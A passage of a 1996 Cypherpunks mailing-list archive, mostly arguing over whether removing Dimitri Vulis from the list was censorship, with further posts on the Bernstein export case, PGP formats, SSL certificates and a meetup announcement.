Message-ID: <Pine.SUN.3.91.961104121108.122E-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Mon, 4 Nov 1996, Dale Thorn wrote:

> Am I missing something, or do some people just not get it?

Yes, Dale is missing something, not the other way around.

(a) What John did was NOT censorship.  Dale's sloppy choice of 
    language to the contrary notwithstanding.

(b) Nobody on this list gave up any freedom.  And we are still 
    the beneficiaries of John's largesse, not his victims.

(c) Freedom has been defended not limited.  If Dimitri or even
    a majority of Cypherpunks could overrule Johns control of
    his own resources, then there would have been a loss of
    freedom with dangerous implications for us all. 

Would Dale be so tolerant if Dimitri were loudly using abusive
language towards Dale's mother and others in her own livingroom?  
Would he accuse her of censorship if she asked Dimitri to leave?  
What would he say if she kicked Dimitri out?  Enquiring minds
want to know.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Mon, 4 Nov 1996 11:19:35 -0800 (PST)
To: declan@eff.org (Declan McCullagh)
Subject: Re: Censorship on cypherpunks
In-Reply-To: <Pine.SUN.3.91.961104044408.13104A-100000@eff.org>
Message-ID: <199611041836.MAA01340@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Declan McCullagh wrote:
> 
> Libertarianism is not incompatible with strict regulations, as long as 
> the rules violate nobody's rights.
> 

I would appreciate an example of "strict regulations" which do not violate
anybody's rights.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Mon, 4 Nov 1996 13:41:58 -0800 (PST)
To: ichudov@algebra.com
Subject: Re: Censorship on cypherpunks
In-Reply-To: <199611041836.MAA01340@manifold.algebra.com>
Message-ID: <Pine.SUN.3.91.961104123842.122G-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Mon, 4 Nov 1996 ichudov@algebra.com wrote:

> I would appreciate an example of "strict regulations" which do
> not violate anybody's rights.

			"This Property Posted
			Trespassors Will be Shot"

Strict enough for you?


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@ctrl-alt-del.com>
Date: Mon, 4 Nov 1996 12:51:57 -0800 (PST)
To: ichudov@algebra.com (Igor Chudov)
Subject: [Noise] Re: Censorship on cypherpunks
Message-ID: <3.0b36.32.19961104124921.01141510@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:36 PM 11/4/96 -0600, Igor Chudov @ home wrote:

>I would appreciate an example of "strict regulations" which do not violate
>anybody's rights.

Obviously you have not known any good Dominatrixes.

"Whip me, beat me, make me write bad crypto!"

---
|  "Remember: You can't have BSDM without BSD." - alan@ctrl-alt-del.com  |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Troy M. Barnhart" <barney@rapidnet.com>
Date: Mon, 4 Nov 1996 11:58:55 -0800 (PST)
To: cypherpunks@toad.com
Subject: Any Info for Sen. Pressler....
Message-ID: <2.2.32.19961104195703.0069f154@rapidnet.com>
MIME-Version: 1.0
Content-Type: text/plain


If anyone has any specific bits of info on cryptography, etc...
please feel free to send it to me...

I live in South Dakota...
Due to circumstances I occasionally see and speak 
w/ Senator Larry Pressler - (Committee Leader)...

(btw, I am not a Pressler plant or anything...)

Been talking to him w/ the Burns Bill and such... 

He wants less gov't. control, but does have "concerns" 
w/ the garbage...
And, wants to balance the business and private concerns...

He is open to any info from a "constituent" though...

regards,

barney



He who joyfully marches to music in rank and file has already earned 
my contempt.  He has been given a large brain by mistake, since for 
him the spinal cord would suffice.  -- Mark Twain
E-mail:  barney@rapidnet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@chromatic.com>
Date: Mon, 4 Nov 1996 13:57:15 -0800 (PST)
To: dc-stuff@dis.org
Subject: Group order for "Secret Power" ... (San Francisco Bay Area only)
Message-ID: <199611042114.NAA01825@ohio.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm looking for 19 other people interested in "Secret Power" (Craig
Potton Publishers has indicated that there is a discount for 20 or
more copies).  If you are in the San Francisco Bay Area, please
contact me by phone or E-Mail.

As usual with these things, I would prefer to see you in person and
have a cash or check committed.  Also remember that the shipping is
quite steep (for the faster methods) ...  The US price uses US$0.71
per NZ$1.00.

                                                 US PRICE
1 Copy
    NZ$27.50 per copy                            US$19.53
    NZ$19.00 for shipping via air                US$13.49
    NZ$12.50 for shipping via economy            US$ 8.88
    NZ$10.00 for shipping via sea                US$ 7.10

20 Copies (per copy)
    NZ$24.75 per copy (10% discount)             US$17.57
    NZ$ 9.50 for shipping via air                US$ 6.75
    NZ$ 7.25 for shipping via economy            US$ 5.15
    NZ$ 5.90 for shipping via sea                US$ 4.19

----
Ernest Hua, Software Sanitation Engineer
Chromatic Research, 615 Tasman Drive, Sunnyvale, CA 94089-1707
Phone: 408 752-9375, Fax: 408 752-9301, E-Mail: hua@chromatic.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@ctrl-alt-del.com>
Date: Mon, 4 Nov 1996 14:56:45 -0800 (PST)
To: cypherpunks@toad.com
Subject: [Portland] Cypherpunks party at Orycon 18
Message-ID: <3.0b36.32.19961104134016.01141510@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


Orycon 18 is a local Science Fiction convention held at the Red Lion hotel
at Janzen Beach this weekend.  I will be having a room party for
Cypherpunks and related crypto-anarchist-types sometime during the
convention.  Anyone who wants more information, just drop me a line.

I will be on a couple of Internet related panels, as well as a "PGP and
Cryptography panel".  Anyone interested in helping out with those, contact
me as well.

---
|  "Remember: You can't have BSDM without BSD." - alan@ctrl-alt-del.com  |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Mon, 4 Nov 1996 14:56:52 -0800 (PST)
To: paul@fatmans.demon.co.uk
Subject: Re: Dr. Vulis is not on cypherpunks any more
In-Reply-To: <847122169.8851.0@fatmans.demon.co.uk>
Message-ID: <Pine.SUN.3.91.961104131800.6281A-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Sun, 3 Nov 1996 paul@fatmans.demon.co.uk wrote:

> It is not a requirement in a libertarian forum to tell the truth.

Granted, but neither is it a requirement to suffer fools.
 
> You also seem to be implying that people need protecting from 
> Dimitri, much the same authoritarian argument we hear from govt. 
> about people needing to be protected from porn/drugs/free spech etc.

(a) I have it on good authority, that "authoritarian" does not
    mean what Paul apparently thinks it does.  Look it up, Paul,
    and then let us know if that's what you actually meant.  
    (Hint:  No one has suggested unquestioning obedience.  A
    better accusation--though still incorrect in the instant 
    case--would be of "paternalism.")

(b) I assure you, that was NOT my implication.  My position is 
    that (1) keeping that sort of noise down is a good thing,
    and (2) it's John's machine and John's call, not ours.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian D Williams <talon57@well.com>
Date: Mon, 4 Nov 1996 14:09:57 -0800 (PST)
To: cypherpunks@toad.com
Subject: [NONCRYPTO] censorship on cypherpunks
Message-ID: <199611042209.OAA25717@well.com>
MIME-Version: 1.0
Content-Type: text/plain



I agree with John's decision.

As others have already pointed out, this list (T.A.Z.) exists
because of the generous nature of our host. It quite literally
exists in his home as I recall. (Toad Hall)

John made numerous requests for Dimitri to be polite to his other
guests and was scorned for his attempt. John then removed him from
his residence.

Dimitri is now standing on the virtual sidewalk outside where he
can continue to shout his insults, since as John knows well, his
actions are no more than a "speedbump". Dimitri can get a list feed
from a number of other sources, and can in fact continue to post.

But John has made his point, and his actions hardly constitute
censorship.

Brian

"A government supported artist is an incompetent fool - Lazarus
Long"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Mon, 4 Nov 1996 11:48:00 -0800 (PST)
To: Will French <wfrench@interport.net>
Subject: Re: Censorship on cypherpunks
In-Reply-To: <199611040326.WAA15698@interport.net>
Message-ID: <Pine.SUN.3.91.961104141734.3858A-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 3 Nov 1996, Will French wrote:

>   Until now, I'd considered the list as a model of a libertarian
> society, with the listowner as the government.  My point is that
> if a mailing list (where physical force is generally not a
> factor) can't be run without arbitrary sanctions against
> members, how could anyone ever hope for a whole society, with a
> real, gun-toting government, to run that way?


Simple.  Go back and read the Constitution of the USA.  You have the 
people carry arms and form militias which only act in the defense of the 
land if need be.  If the people carry arms, they can't be overthrown by a 
gun toting forceful government with such ease as you suppose.  The most 
civilized societies are those where everyone is armed.  You'd be 
surprised at the amount of politeness this encourages.

=============================================================================
 + ^ + |  Ray Arachelian    |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@sundernet.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/=
  /|\  | "A toast to Odin,  |KA| law abridging the freedom of speech'|==\|/==
 + v + |God of screwdrivers"|AK|        do you not understand?       |=======
========================http://www.sundernet.com=============================
      If the Macintosh is a woman...  Then Windows is a Transvestite!
           ActiveX! ActiveX! Format Hard drive? Just say yes!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Mon, 4 Nov 1996 14:52:14 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Telling quote from Bernstein hearing
Message-ID: <3.0b28.32.19961104142333.0077f868@mail.io.com>
MIME-Version: 1.0
Content-Type: text/plain


Rich Burroughs wrote:

> I did not find his arguments very persuasive -- he seemed stuck on the idea
> that crypto is not speech, when that had already been ruled against by
> Judge Patel.

As I understand the government's argument, this is what they're trying to say:

Even though code can be speech, if it is executable code it is speech and
something else at the same time. The government is entitled to regulate or
prohibit the export of the "something else" without regard to the speech
component, as long as they are content-neutral with respect to the speech
component. For example, a cruise missile is subject to export control.
Painting words on the side of the missile won't change that. Executable
crypto code is subject to export control, and the fact that it has an
expressive component doesn't change that. The comments about "We don't know
or care what Mr. Bernstein is doing and we're not trying to control his
academic discourse" were intended to emphasize that the government is
content-neutral with respect to the expressive content of his crypto code.
Because the regulations are content-neutral with respect to the expressive
content, they are subject to an "intermediate scrutiny" standard (not the
"strict scrutiny" standard which would be applied if the restrictions were
content-based). The government believes that the AECA and the ITARs can
pass the "intermediate scrutiny" test.

In a nutshell, the government thinks that the expressive content of code is
the algorithm(s) expressed in it. For example, expressive content of PGP
2.x is RSA and IDEA and MD5 and some key management stuff. And they say
that their regulations won't be interpreted to cover versions of that
expressive content which don't take the form of machine-readable code. 

While I think that the entire export control scheme, as it is applied to
crypto today, is an exercise in dishonesty and futility*, I think that the
questions this case presents are difficult questions. I don't think it's
really comprehensible to separate the "expressive content" of source code
from its "functional content", because one dictates the other. Either the
government is able to control the functional content (in which case it
controls the expressive content), and the First Amendment is seriously
curtailed; or the government is unable to control the functional content,
and its ability to control the production and import/export of items of
politico/military significance is seriously curtailed. Historically, courts
have been deferential to the executive branch's ability to control military
and political/diplomatic matters. 

Either way, someone's pissed off, and someone thinks the court is sending
the country to hell in a handbasket. The "crypto is central to national
security" argument shouldn't be dismissed summarily - at least not if you
think Tim's predictions about cryptoanarchy are accurate. Crypto _is_
important. Crypto _is_ significant in the political and military venues.

(* It's dishonest and futile because it is insufficient to reach its stated
goals - if the purpose is to prevent the spread of strong crypto worldwide,
the government must control the expression of strong crypto algorithms and
techniques in all media and all forms. Such regulation would be
incompatible with the First Amendment and freedom generally. The present
regulations are so poorly matched to the apparent goal that I suspect they
have another purpose; and I suspect that purpose is to control the domestic
development of strong crypto. And attempting to do so while claiming to do
something else is dishonest. (That result is also incompatible with the
First Amendment and freedom generally.) And that's what I think of crypto
regulations, whether or not I appear to be agreeing with the government.) 
--
Greg Broiles                |  "We pretend to be their friends,
gbroiles@netbox.com         |   but they fuck with our heads."
http://www.io.com/~gbroiles |
                            |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph93szh@brunel.ac.uk
Date: Mon, 4 Nov 1996 06:32:04 -0800 (PST)
To: junger@pdj2-ra.F-REMOTE.CWRU.Edu (Peter D. Junger)
Subject: Re: British Telecom merger with MCI
In-Reply-To: <199611041159.GAA21112@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <16832.199611041429@molnir.brunel.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain




 BT/MCI aka Concert will have offices based in London and
 Washington. Technically Concert won't be a foreign company
 I guess.

 Zaid






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Hayes <dave@kachina.jetcafe.org>
Date: Mon, 4 Nov 1996 14:49:58 -0800 (PST)
To: ichudov@algebra.com (Igor Chudov)
Subject: Re: Compromise proposal
Message-ID: <199611042249.OAA22414@kachina.jetcafe.org>
MIME-Version: 1.0
Content-Type: text/plain


> [this goes to cypherpunks@toad.com and freedom-knights@jetcafe.org. I am
> not reading f-k, but I am interested in Dave Hayes's opinion.]

What weight can my opinion possibly have? This list is apparently
owned by a Mr. John Gilmore. If he's being censorous, that's bad,
but it is apparently within his means to execute said censorship.

> Many members of cypherpunks list are right when they oppose the forced
> unsubscription of Dimitri Vulis from this list. The sorry state of this
> list is not the result of his flames alone, there is a large number of
> people who discuss things of no cryptographic relevance.

Not to speak for the cypherpunks (we all know their reputation) but I 
should think the cypherpunks are savvy enough to know the subjectivity
of the term "on-topic". 

> I propose the following:
> 	1) The block on Dimitri Vulis's subscriptions should be removed
> 	2) We should not impose any limitations on anyone's speech except 3)
> 	3) Dimitri and everyone else should put prefix "[FLAME]" 
>            into all Subject: header fields of their flame-related 
> 	   messages.

Gee. What a great idea. 

> This solution will allow anyone with a clue to use appropriate filtering
> and improve the signal-noise ratio, and at the same time will not in any
> way limit anyone's freedom of speech.

Improving signal to noise is a laughable goal at a social event of
more than 100 people, why do people insist upon trying it on the net?
------
Dave Hayes - Altadena CA, USA - dave@jetcafe.org 
Freedom Knight of Usenet - http://www.jetcafe.org/~dave/usenet

Be wary of strong drink.  It can make you shoot at tax collectors and miss






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Thomas C. Allard" <m1tca00@FRB.GOV>
Date: Mon, 4 Nov 1996 12:22:41 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Censorship on cypherpunks [RANT]
In-Reply-To: <327E09AF.489E@gte.net>
Message-ID: <199611042017.PAA05796@bksmp2.FRB.GOV>
MIME-Version: 1.0
Content-Type: text/plain



This will be my one and only post on the topic.  Let me first say that I 
support Gilmore's decision...

Dale Thorn <dthorn@gte.net> said:
> Adamsc wrote:
>
> > This has been taken far too seriously.  Cypherpunks is a *PRIVATE* list.
> > There is no obligation to accept anyone.
>
> Isn't this the same argument used by the state whenever they want
> to differentiate between your "rights" and your "privileges"?  Can
> they reject one of your privileges whenever they want to, at their
> discretion?  No.

I don't understand your argument here at all.  There are, in a libertarian 
society, no "positive" rights (that is to say, the government owes you 
nothing).  There are only "negative" rights (that is to say, there are 
things to gov't can not DO to you).

When the gov't talks about censoring the works of Maplethorpe or other 
"offensive" art, I think they have every right to do so since they (we) PAY 
for it.  The gov't does not owe artists the "right" to have their work 
created at the public's expense.  In a libertarian society, the gov't 
wouldn't subsidize speech or art in the first place.  If they want to pay 
for it themselves, the gov't can not restrict them.  They can't force me to 
pay for it.  And no one can force Gilmore to let Vulis destroy cypherpunks.

> So if c-punks is really "private", how does it decide (arbitrarily?)
> who to include and who to reject?

The answer is pretty obvious if you just think about it... if the list is 
"private" (i.e. private PROPERTY), then the person who *owns* it gets to 
make the decision.  The owner can even make the decision arbitrarily.

The decision to remove Vulis, however, does not seem arbitrary.  It was 
not, I think, based on a whim.

If you owned a bar in a libertarian society, and one of your patrons stood 
up on the bar and took a whiz, would you say that his self-expression was 
censored when the bouncer tossed him out on his arse?  Would you call it 
arbitrary?


> Note that I'm not saying that it's absolutely wrong to reject anyone,
> at any time necessarily, I just don't think your last sentence about a
> *private* list was well thought out.

I think it was very well thought out and I think Adamsc knew exactly what 
he was saying.

rgds-- TA  (tallard@frb.gov)
I don't speak for the Federal Reserve Board, it doesn't speak for me.
pgp fingerprint: 10 49 F5 24 F1 D9 A7 D6  DE 14 25 C8 C0 E2 57 9D






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Mon, 4 Nov 1996 12:28:56 -0800 (PST)
To: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Subject: Re: British Telecom merger with MCI
In-Reply-To: <199611041159.GAA21112@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <Pine.WNT.3.95.961104152209.-1035279A-100000@hilly.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 4 Nov 1996, Peter D. Junger wrote:

> 
> Has anyone figured out how this merger can work, particularly when
> British Telecom will be the surviving party, when those MCI employees
> concerned with the security of communications will not be able to
> disclose any cryptographic software or technical data to their

It's reasonably  trivial to get export licences from both countries 
for foreign subsidiaries. Also, British Telecom and GCHQ have a 
friendly working relationship, and any merger is unlikely to change
these facts.

Simon





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bodo Moeller <3moeller@informatik.uni-hamburg.de>
Date: Mon, 4 Nov 1996 06:58:55 -0800 (PST)
To: aba@dcs.ex.ac.uk
Subject: Re: pgp3
In-Reply-To: <199610251026.LAA01407@server.test.net>
Message-ID: <199611041456.PAA04432@rzdspc135.informatik.uni-hamburg.de>
MIME-Version: 1.0
Content-Type: text/plain


Adam Back (aba@dcs.ex.ac.uk):

> An altavista serach found an Internet Draft entitled `PGP Message
> Exchange Formats', however this appears to be a re-write of
> pgformat.txt which is distributed with PGP, with some comments
> explaining expansion directions [...]

> Someone suggested to me that Derek posted a draft spec for PGP 3.0.
> Anyone know of the whereabouts of this document.

Yes.  That document has evolved to RFC 1991:

1991  I   D. Atkins, W. Stallings, P. Zimmermann, "PGP Message Exchange  
           Formats", 08/16/1996. (Pages=21) (Format=.txt) 


< Network Working Group                                          D. Atkins
< Request for Comments: 1991                                           MIT
< Category: Informational                                     W. Stallings
<                                                     Comp-Comm Consulting
<                                                            P. Zimmermann
<                                             Boulder Software Engineering
<                                                              August 1996
< 
< 
<                       PGP Message Exchange Formats
[...]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Philip L. Karlton" <karlton@netscape.com>
Date: Mon, 4 Nov 1996 16:35:04 -0800 (PST)
To: Sam Quigley <osquigle@midway.uchicago.edu>
Subject: Re: free SSL CAs?
In-Reply-To: <Pine.GSO.3.95.961103231441.3151I-100000@kimbark.uchicago.edu>
Message-ID: <327E8B63.1D5C@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Sam Quigley wrote:
> 
> I've set up my own CA, and given myself my own cert., but having the same
> server you're interacting with being the one that's the CA for the
> transaction leaves the setup open to man-in-the-middle attacks (I'd think,
> at least...).

It's up to the user (at least with the Netscape Navigator) to decide
what CA certificates or particular server certificates to trust.
Self-signed certificates are logically at the root of any certificate
chain.

PK
--
Philip L. Karlton			karlton@netscape.com
Principal Curmudgeon			http://www.netscape.com/people/karlton
Netscape Communications Corporation

    Everything should be made as simple as possible, but not simpler.
	-- Albert Einstein




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 4 Nov 1996 13:53:51 -0800 (PST)
To: Declan McCullagh <wfrench@interport.net>
Subject: Re: Censorship on cypherpunks
Message-ID: <3.0b19.32.19961104164654.007192c4@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:45 AM 11/4/96 -0800, Declan McCullagh wrote:
>Libertarianism is not incompatible with strict regulations, as long as 
>the rules violate nobody's rights.
>
>-Declan

Obviously many voluntary religious organizations have quite strict rules
for their members and are compatible with libertarianism.  Government
monopoly regulations that cannot be opted out of are not compatible with
libertarianism.  Instead of using the loaded term "regulations' it might be
better to call things like the rules of the cypherpunk's list "club rules"
or protocols.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Tue, 5 Nov 1996 03:06:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: Bay Area Cypherpunks Meeting, Saturday Nov 9, C2Net, OAKLAND
Message-ID: <1.5.4.32.19961105005913.00391f1c@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


November's Cypherpunks meeting will be held at C2Net's office in Oakland,
1212 Broadway, 14th floor, at 1-5 pm.  (12:00 for lunch/hanging around,
1:00 program.)

Agenda:
- Demo: Ecash plug-in for Netscape
- Bernstein Hearing updates - there'll be another hearing Friday 11/8.
- Stronghold secure web server
- Mondex smartcard weaknesses
- Possible IPSEC update
- Show&Tell - bring toys!
- Bagels

Directions:
1212 Broadway, Oakland, 14th Floor, between 12th & 13th on broadway, 
immediately above the 12th st/city center bart station.
Parking garage at the corner of 13th & franklin, one block away.
The parking garage closes at 6pm on saturdays though, 
so you need to be careful you don't leave your car there past six. 
We're on the 14th floor. The door is locked; see guard for access.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk
# Nov. 5 is Guy Fawkes Day - Vote Early and Often, and create Fireworks!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lile Elam <elam@art.net>
Date: Mon, 4 Nov 1996 17:05:07 -0800 (PST)
To: cypherpunks@toad.com
Subject: black high heal shoes?
Message-ID: <199611050102.RAA27424@art.net>
MIME-Version: 1.0
Content-Type: text/plain



Hi all,

I had the strangest dream this morning. I drempt that I had 
forgotton to vote!  

As I was heading for the poles, I saw Dole heading into the
poles wearing a man's coal grey/black suit and womens' black high 
heal shoes. It was pretty bazzar.... I wonder what it means?
It was pretty scary...

Turns out I was too late getting to the poles to vote and I awoke
in a panic thinking I had missed it all. I turned to my sleeping
babe and after I awoke him, he assured me that voting happens 
tomorrow.

Whew!

-lile




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Douglas Barnes <cman@c2.net>
Date: Mon, 4 Nov 1996 19:41:05 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: NSA Report: Anyone seen this?
Message-ID: <2.2.32.19961105013727.008c3764@blacklodge.c2.net>
MIME-Version: 1.0
Content-Type: text/plain



The paper does, however, repeat the "infinity liability"
fallacy. (See: http://www.c2.net/~cman/)

At 02:38 PM 11/3/96 -0800, you wrote:
>I just finished reading the report "How to Make a Mint: The Cryptography of
>Anonymous Electronic Cash" by Law, Sabett & Solinas. It can be found at
><http://jya.com/nsamint.htm>.
>
>It is very well written with only identification of the issues except in
>the last short paragraph where they clearly lean toward government
>interests.
>
>They identify and distinguish interests of the bank, the consumer's
>privacy, and the government. Some of the measures that they describe
>(providing for traceability) might well be done by a bank operating in an
>anarchy. Imagine that you are running a bank in an anarchy and the son of
>one of your good customers is kidnapped and held for ransom. Suppose that
>the kidnapper is a good customer of another bank with whom you have an
>arm's length relation. The arguments are not simple. Only towards the end
>does the paper begin to conflate the interests of the government and the
>bank. Some of the law enforcement purposes that they describe would apply
>to the anarchy bank, others would not.
>
>The paper is the best description I have seen of several advanced money
>schemes. It has a better description of Chaum's off-line scheme than I had
>seen before. It describes sever even more advanced schemes, both abstracted
>form the mathematical details, and then with the details filled in.
>
>
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@tivoli.com>
Date: Mon, 4 Nov 1996 15:40:56 -0800 (PST)
To: paul@fatmans.demon.co.uk
Subject: Re: Dr. Vulis is not on cypherpunks any more
In-Reply-To: <847122169.8850.0@fatmans.demon.co.uk>
Message-ID: <327E7E55.51AE@tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


paul@fatmans.demon.co.uk wrote:
> 
> John, if you, and those who support your actions, claim to be
> libertarians you need to take a good hard look at what you have 
> done.

John owns toad.com.  John can do what he wants to with it.  End of
story.

> This is a distinctly "big cypherpunkish" move 

Hogwash.  "Big cypherpunkish".  Snort.  Like exclusion from the cp
list has some actual societal import.

> and really cannot be condoned 

I hereby condone it.

______c_________________________________________________________________
Mike M Nally * IBM % Tivoli * Austin TX  * How quickly we forget that
mailto:m5@tivoli.com mailto:m101@io.com  * "deer processing" and "data
http://www.io.com/~m101/                 * processing" are different!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rcgraves@ix.netcom.com>
Date: Mon, 4 Nov 1996 14:45:03 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Censorship on cypherpunks
Message-ID: <199611042242.RAA05013@spirit.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Geez, the traffic has quadrupled, with most of it about Vulis. Get over 
it already!

And so, just to add to the garbage, here's my two cents. :-)

Declan McCullagh wrote:
> 
> Libertarianism is not incompatible with strict regulations, as long as
> the rules violate nobody's rights.

Now, there's an Orwellian statement if ever there was one.

OF COURSE Vulis's "rights" were violated. The question is, so what? The 
decision was neither arbitrary nor capricious. I find the rational 
balancing of rights and responsibilities to be less wrong than defining 
away your opponent's rights.

Since AFAIK there was no precedent for kicking Vulis off, and in fact 
cpunks has long prided itself on absolute anarchy (especially after the 
victory of the Tim May [neutral term for rant] factions over the 
Perrygram faction), there is a "rights" issue. I think cpunks broke an 
implied contract guaranteeing Vulis absolute rant rights. But I also 
think that that's OK.

It's ironic that you're making this argument while a piece from you 
making the opposite argument is still on the news stands. My response to 
your half of the Internet Underground article can be found on Usenet, 
but I think the best summary of my position came in my response to the 
contrary point of view -- concurring in your judgement, but disagreeing 
with your reasoning.

- From <53i4d5$skm@Networking.Stanford.EDU>:

|>FLAMETHROWER
|>By Solveig Bernstein (sberns@cato.org)
|>
|>The decision to remain silent is an act of conscience, just like the
|>decision to speak. So the view that acts of "private censorship"
|>violate rights of free speech is incoherent. If an online service
|>provider ousts a Web site that posts explicit messages about sex, in
|>violation of the terms of their service contract, or a non-profit
|>organization persuades some Internet Service Providers to refuse to
|>host "Holocaust Revisionist" web sites, these decisions do not violate
|>rights of free speech.
|
|I agree, up to a point. The only "right" of free speech is the right to 
|be free from force and threats of force based on the content of speech. 
|As publishers, librarians, archivists, and access providers, though, we 
|have a *duty* to society to tolerate ideas we despise. But this duty
|comes from the public's right to know and from the kind of people we
|are, not from the "rights" of the speakers.
|
|Anyone who claims to be a content-neutral ISP, a librarian, or an
|unbiased source of news who suppresses things she doesn't like is a
|*LIAR AND A FRAUD* because she is giving her audience a dishonest,
|distorted view of the world. Protests against such capricious exercises
|of editorial power are appropriate and are necessary, but they should
|be viewed as attacks on the character of the editor, not defenses of 
|the human rights of the suppressed.

In this case, I think any fair investigation of the facts of the matter 
would clearly demonstrate that Gilmore was right to kick Vulis off, and 
that he was neither acting capriciously nor removing any substantive 
content. I do believe, though, that that's an investigation we must be 
prepared to accept (not that I think anyone's seriously going to ask for 
one, given the relative reputations of the parties involved). Granting 
the cpunks owner absolute property rights over the content of messages 
on the list, though, as you do, while strictly correct, is extremely 
dangerous because it gives license to all kinds of distoritions, lies, 
and fraud. The right of "the public" to inquire and respond must be 
respected.

And it has been, as all these useless threads show.

- -rich
 owner-fight-censorship-discuss@c2.net
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMn5xRioZzwIn1bdtAQH7JwGAhI91c5/AkamPaUUlfkC95sRzmHn6uUx9
j/AGAZQ4QTw6SHdgl5rBu9SkpncTh43b
=Q7O4
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Betty G. O'Hearn" <betty@infowar.com>
Date: Mon, 4 Nov 1996 14:45:18 -0800 (PST)
To: news_from_wschwartau@infowar.com
